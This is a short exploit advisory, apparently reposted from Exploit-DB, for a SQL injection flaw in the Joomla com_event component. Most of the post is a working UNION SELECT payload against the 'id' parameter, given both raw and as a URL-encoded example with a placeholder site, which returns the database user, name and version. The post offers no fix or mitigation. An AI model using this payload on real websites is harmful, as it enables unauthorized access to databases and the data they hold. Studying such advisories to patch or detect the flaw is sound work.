Creato Domenica, 30 Maggio 2010 17:36
# EDB-ID: 12639
# CVE-ID: ()
# OSVDB-ID: ()
# Author: N/A
# Published: 2010-05-17
# Verified: yes
# Download Exploit Code
# Download N/A
# Exploit Title: Joomla Component com_event another sql injection vuln |
# Date: 17/5/2010 |
# Author: N/A |
# Software Link: www.joomla.org/download.html |
# Version: Multible versions |
# Code : |
The Attacker Can Exploit A SQL injection vuln in the following: |
The Sql injection query: |
index.php?option=com_event&task=view&id=-14 UnioN/**/SelECt 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- |
Example: |
http://[site]/index.php?option=com_event&task=view&id=-14%20UnioN/**/SelECt%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4-- |
Thanks To All Muslims |
Questo indirizzo email è protetto dagli spambots. E' necessario abilitare JavaScript per vederlo.
|
Categoria: Vulnerabilità Joomla